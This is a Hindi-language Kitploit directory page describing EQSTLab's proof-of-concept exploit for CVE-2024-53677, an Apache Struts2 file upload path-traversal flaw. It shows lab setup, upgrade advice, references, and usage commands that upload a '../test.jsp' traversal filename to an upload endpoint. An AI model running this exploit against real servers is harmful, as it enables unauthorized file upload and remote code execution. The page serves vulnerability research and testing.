Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-53677 — Apache Struts2 एक्सप्लॉइट में फ़ाइल अपलोड लॉजिक खामी | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-53677
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubeqstlab/cve-2024-53677

CVE-2024-53677

Apache Struts2 एक्सप्लॉइट में फ़ाइल अपलोड लॉजिक खामी

रिपॉजिटरी देखें
1721 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।

CVE-2024-53677

★ CVE-2024-53677 खतरनाक प्रकार की फ़ाइल का अनियंत्रित अपलोड और RCE PoC ★

लैब सेटअप

root@kitploit:~
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677

समयरेखा

Dec 11 : CVE-2024-53677 फ़ाइल अपलोड PoC अपलोड किया गया

विवरण

CVE-2024-53677 : Apache Struts में फ़ाइल अपलोड लॉजिक त्रुटिपूर्ण है। एक हमलावर फ़ाइल अपलोड पैरामीटर्स में हेरफेर करके पाथ ट्रैवर्सल सक्षम कर सकता है और कुछ परिस्थितियों में यह एक दुर्भावनापूर्ण फ़ाइल अपलोड करने का कारण बन सकता है जिसका उपयोग रिमोट कोड एक्ज़ीक्यूशन करने के लिए किया जा सकता है। यह समस्या Apache Struts के 2.0.0 से 6.4.0 से पहले के संस्करणों को प्रभावित करती है। उपयोगकर्ताओं को सलाह दी जाती है कि वे कम से कम संस्करण 6.4.0 में अपग्रेड करें और नई फ़ाइल अपलोड मैकेनिज्म पर माइग्रेट करें https://struts.apache.org/core-developers/file-upload . यदि आप FileuploadInterceptor पर आधारित पुरानी फ़ाइल अपलोड लॉजिक का उपयोग नहीं कर रहे हैं, तो आपका एप्लिकेशन सुरक्षित है। आप अधिक विवरण https://cwiki.apache.org/confluence/display/WW/S2-067 में पा सकते हैं।

उपयोग कैसे करें

Git क्लोन

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677

पैकेज इंस्टॉल करें

root@kitploit:~
pip install -r requirements.txt

कमांड

root@kitploit:~
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>

उदाहरण

root@kitploit:~
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt

आउटपुट

CVE-2024-53677.py

परिणाम

अस्वीकरण

यह रिपॉज़िटरी CVE-2024-53677 के लिए Object injection एक्सप्लॉइट होने का इरादा नहीं रखती है। इस प्रोजेक्ट का उद्देश्य लोगों को इस कमज़ोरी के बारे में सीखने में मदद करना है, और शायद अपने स्वयं के एप्लिकेशन का परीक्षण करना है।

EQST अंतर्दृष्टि

हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें। https://www.skshieldus.com/eng/business/insight.do

संदर्भ

https://nvd.nist.gov/vuln/detail/CVE-2024-53677

https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677

https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker

टूल डाउनलोड करें